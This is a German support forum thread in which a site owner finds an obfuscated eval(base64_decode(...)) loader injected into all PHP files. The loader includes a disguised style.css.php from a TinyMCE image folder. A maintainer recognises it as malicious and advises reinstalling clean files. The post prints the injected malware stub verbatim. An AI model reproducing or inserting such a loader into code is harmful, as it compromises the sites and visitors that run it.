Alle externen PHP Dateien infiziert + zugehörige Datei existiert nicht

Read-Only-Modus

Das 01-Supportforum befindet sich im Read-Only-Modus. Es ist nicht mehr möglich sich zu registrieren, neue Themen zu erstellen oder auf bestehende Themen zu antworten.

Alle Inhalte stehen bis auf absehbare Zeit jedoch weiterhin lesend zur Verfügung.


Bei Fehlern oder Problemen mit PHP-Scripten von 01-Scripts.de erstellen Sie gerne einen Issue-Eintrag auf Github oder nehmen Sie per E-Mail Kontakt auf.

  • Hallo,


    ich habe ein großes Problem:


    Als ich meine Webseiten,Foren und Scripte auf einen neuen Server umziehen wollte, bekam ich viele PHP Fehlermeldungen von Scripten und alle Sripte laufen nicht. Beim genauen hinschauen, steht in jeder PHP Datei auf dem Server folgender Code:


    PHP
    1. <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRH TE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3dlYjE2MC9odG1sL2 FubmFzb3BoaWFyb2JiL25ld3MvMDFhY3Avc3lzdGVtL3Rpbnlf bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG 9va3MyL2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0 cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE 9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21s JykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3Rhcn QoJ2Rnb2JoJyk7fX19')); ?>


    Decodiert schaut der Code so aus:



    Die "style.css.php" existiert leider bei mir nicht mehr.


    Ich hoffe, zu diesem Problem gibt es eine Lösung :whistling: .


    Lg


    Adromia

  • Hallo,


    sind denn nur PHP-Dateien des Artikelsystems betroffen?
    Um ehrlich zu sein hab ich momentan keine Ahnung durch was sowas verursacht worden sein könnte.
    Als Lösungsmöglichkeit fällt mir momentan nur ein alle PHP-Dateien zu löschen und anschließend die Original-Dateien neu hochzuladen (die Datei 01_config.php ausgenommen!).
    Da die ganzen Daten ja in der Datenbank hinterlegt sind, sollte es dabei eigentlich auch zu keinem Datenverlust kommen.


    MfG,
    Michael Lorer

  • Hallo,


    sind denn nur PHP-Dateien des Artikelsystems betroffen?



    Alle PHP Dateien des Artikelsystems sind sauber bzw. nicht betroffen. Jedoch sind alle anderen PHP Dateien betroffen.


    Haben Sie vielleicht noch die "style.css.php" Datei irgendwo liegen? Dann kann ich eventuell versuchen, ob ich damit alle meine Seite und Scripte zum laufen bekomme.


    Lg


    Adromia

  • Also dieser Code hat definitiv nichts in diesen Dateien zu suchen.
    Und diese ominöse style.css.php-Datei gibt es im original Download garnicht.
    Ich denke eher, dass da jemand versucht hat illegalen Code auf Ihrer Seite auszuführen.


    Ich würde deshalb vorschlagen alle PHP-Dateien durch eine neu heruntergeladene Version von 01-Scripts.de zu ersetzen.


    MfG,
    Michael Lorer